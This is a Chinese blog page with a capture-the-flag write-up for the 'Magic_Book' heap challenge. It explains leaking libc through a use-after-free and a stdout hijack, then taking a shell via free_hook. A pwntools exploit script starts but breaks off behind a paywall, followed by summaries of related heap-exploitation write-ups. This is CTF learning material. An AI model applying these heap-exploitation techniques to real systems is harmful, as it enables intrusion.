Magic_Book(stdout泄露地址)

原创 已于 2022-11-05 18:26:28 修改 · 344 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

于 2022-11-03 19:37:33 首次发布
本文介绍了一种利用UAF漏洞的方法,通过精心构造payload来泄露内存地址,并最终获取shell。文章详细展示了如何通过修改特定内存区域来实现对free_hook的劫持。

请添加图片描述
这题没有show,edit,但是有个uaf。
因为我们没有show函数无法泄露地址,所以我们需要打stdout来泄露地址。

参考代码:

from pwn import *
context.update(os='linux',arch='amd64',log_level='debug')
#c=remote(b'node4.buuoj.cn',25937)
# c=process(b'./pwn1')
libc=ELF(b'/pwn/libc')


#def dbg():
#	gdb.attach(c,'''


#	b *$rebase(0x14a1)
#	b *$rebase(0x14f9)
#	b *$rebase(0x15d7)
#	b *$rebase(0x1684)
#
#
#	''')
def dbg():
    gdb.attach(c)
    pause()


def add(size,content):
	c.sendlineafter(b'choice : ',b'1')
	c.sendafter(b'Size: ',str(size))
	c.sendafter(b'Content: ',content)
	
	
	
	
def free(idx):
	c.sendlineafter(b'choice : ',b'2')
	c.sendlineafter(b'dex: ',str(idx))
	
	
def luck_free(idx):
	c.sendlineafter
最低0.47元/天 解锁文章
nsctf_online_2019_pwn1(劫持IO_2_1_stdout泄露地址)
seaaseesa的博客
04-30 1454
nsctf_online_2019_pwn1 首先,检查一下程序的保护机制 然后,我们用IDA分析一下 Edit功能里存在一个null off by one漏洞 没有show功能 我们可以利用fastbin attack,修改IO_2_1_stdout的_IO_write_base,这样,当再次调用puts或printf的时候,就会泄露出_IO_write_base~_IO_...
【BUUCTF】roarctf_2019_realloc_magic---从一道题认识realloc函数+stdout泄露libc地址实战
Assassin
09-18 2308
realloc好题
【八芒星计划】 劫持_IO_2_1_stdout_泄露libc
carol2358的博客
09-02 1329
这一篇讲劫持_IO_2_1_stdout_泄露libc,应用在没有show的heap题里,首先申明,所有的都需要爆破,并且2.27由于tcache的存在使得2.27的劫持_IO_2_1_stdout_比2.23简单 文章目录CISCN2020 easyboxsmaj CISCN2020 easyboxs libc2.23 off by one+劫持_IO_2_1_stdout_ 有add和free add(0, 0x18, 'a') add(1, 0xf8, 'a') add(2, 0x68, 'a'
ycb2020babypwn(unsortedbin爆破stdout泄露)
qq_33590156的博客
12-04 526
题目没有leak函数,肯定得打stdout,但是又是个2.23,有指针没清零的漏洞 在stdout-0x43的地方有0x7f的size,而且和main_arena+88很近,最后三位固定是0x5dd,所以需要爆破第二个字节的高位,概率是1/16。这应该是没leak的通用打法 然后题目是通过double free,控制堆块,修改size进unsortedbin,然后爆破fd,申请出stdout泄露libc,最后打malloc_hook和realloc去getshell。 操作 首先肯定是double free
堆技巧 数组反向越界泄露地址
tbsqigongzi的博客
09-02 390
痛苦痛苦痛苦,调了半天才找到数组起始地址,还是自己太菜了,好好记录一下这题题目给了libc,2.31的题嗯,可以考虑覆盖got表或者hook函数打开ida发现是c++的题,认真分析一下。
重学IO:利用_IO_2_1_stdout泄露libc
2301_79327647的博客
08-19 1235
这几天做IO类的题,发现自己是真的菜,决定暂时放一放apple1的学习,重新学习一下IO流。 本篇源码还是glibc-2.35。
_IO_2_1_stdout_泄露内存
qq_45595732的博客
03-25 896
在做heap时有时候并没有自带的输出模块,所以打_IO_2_1_stdout_成了一种常用手段。一般只出现在glibc2.23版本下glibc2.27下aslr随机的位数比较多爆破概率比较小,没算错的话应该时1/4096,而2.23的情况下是1/16。 这里记录两道例题,也忘了是哪里的题了,反正模板题。以便以后快速复现把 一道off-by-one配合_IO_2_1_stdout,一道double free配合_IO_2_1_stdout 例题1 关键字:_IO_2_1_stdout_、off-by-one
De1ctf收获:用_IO_2_1_stdout_泄露libc地址 weapon的writeup
哒君的博客
08-11 1681
GitHub 例行公事 可以看出保护全开 进行分析 可以发现程序功能很简单 create delete rename create 限定大小最大只能是0x60 index只能是0-9但是是自个输入的 存在一个结构,struct[0] = size,struct[1] = ptr readn函数没有用\x00截断 delete 中间index的判断有问题,且存在uaf ren...
de1ctf_2019_weapon【buuctf刷题】【stdout泄露libc、fastbin attack】
m0_73756460的博客
07-10 409
de1ctf_2019_weapon【buuctf刷题】【stdout泄露libc、fastbin attack】
Double Free浅析(泄露地址的一种方法)
omnispace的博客
04-18 7674
Double Free其实就是同一个指针free两次。虽然一般把它叫做double free。其实只要是free一个指向堆内存的指针都有可能产生可以利用的漏洞。double free的原理其实和堆溢出的原理差不多,都是通过unlink这个双向链表删除的宏来利用的。只是double free需要由自己来伪造整个chunk并且欺骗操作系统所以好像和普通的堆溢出伪造chunk然后free触发unlink...
linux内核泄露地址的方式
inquisiter
09-16 624
早些的时候可以利用dmesg通过缺页错误来泄露内核地址,但新一点的内核把这个修复了。最近看了下,遇到了目前常用的方式,详细分析下。 shmat 大部分搜到的记录是利用 struct shm_file_data { int id; struct ipc_namespace *ns; struct file *file; const struct vm_operations_struct *vm_ops; }; #define shm_file_data(file) (*((st
Largebin attack & house of cat
qq_42220888的博客
07-12 431
largebin attack house of cat
BUUCTF-PWN roarctf_2019_realloc_magic(tcache attack,块重叠,劫持_IO_2_1_stdout_泄露libc)
weixin_44145820的博客
04-17 2193
目录题目分析漏洞利用Exp 题目分析 free没有限制,可以多次free 使用realloc进行内存分配,没有限制大小 realloc的几个特殊用法(摘自官方WP) size == 0 ,这个时候等同于free realloc_ptr == 0 && size > 0 , 这个时候等同于malloc malloc_usable_size(realloc_ptr) &g...
RCTF - Exploitation 200 welpwn - writeup
HiTaQini
12-02 3089
RCTF 2015 welpwn 200 linux 64位 栈溢出 ROP + leak libc
泄漏地址总结(Dynelf & LibcSearcher)
weixin_44319142的博客
04-16 2774
Dynelf泄漏modeul 32位 p = process('./xxx') def leak(address): #address指要泄露地址 #各种预处理 payload = "xxxxxxxx" + address + "xxxxxxxx" p.send(payload) #各种处理 data = p.recv(4) log.debug("%#x => %...
堆中获取地址和劫持执行流的方法
九层台
09-02 2099
栗子https://github.com/tower111/software.git 0x01获取栈地址 详细writeup:https://tower111.github.io/2018/08/30/ISG-babynote/ 原理:在fast bin是单链在内存中保存,在fd位置处会写入next chunk的地址,这个地址可以用来获取heap_base。 栗子:babynote 需要...
2016 Seccon tinypad
yms0211的博客
09-26 620
house of Einherjar练习题
pwn 堆溢出之 泄露基址
qq_41071646的博客
04-25 3409
先声明一下本文的参考链接 https://blog.youkuaiyun.com/weixin_34050005/article/details/86881709?tdsourcetag=s_pctim_aiomsg 这篇博客写的非常好 受教了 本来其实我是看的另一道题 但是那道题 感觉并不是很适合我这种萌新 然后我就看到了这道题 就 由于这个篇文章写的很清楚 而且 代码直接就可以拿到f...
FILE __stdout; 提示重复定义 __stdout
最新发布
10-03
在STM32使用Microlib进行C++开发时,`FILE __stdout;`提示重复定义,通常是因为在多个文件中重复定义了该变量。解决此问题可以采用以下方法: #### 1. 使用头文件保护 如果`FILE __stdout;`定义在头文件中,可添加...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值